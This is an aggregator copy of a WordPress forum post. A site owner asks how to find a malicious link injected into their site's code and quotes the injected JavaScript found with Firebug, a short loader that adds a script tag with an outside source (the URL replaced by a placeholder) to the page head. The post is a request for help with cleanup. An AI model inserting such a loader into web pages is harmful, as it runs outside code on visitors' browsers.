Quantcast
Channel: virus – WordPress.org Forums
Viewing all articles
Browse latest Browse all 1529

hdaackda on "Find a specific link inside code"

$
0
0

One solution in my mind is to download the WHOLE website, then use a text searcher (like notepad++) etc.. but that is tooo inefficient, esp if the site is big

EDIT

using the FIREBUG Addon... if I double click on that malicious <script> code... I get

var oScript = document.createElement("script");
	oScript.type = "text/javascript";
 	oScript.src = "LINK OF mALICIOUS SITE HERE";
 	document.getElementsByTagName("head")[0].appendChild(oScript);

Viewing all articles
Browse latest Browse all 1529

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>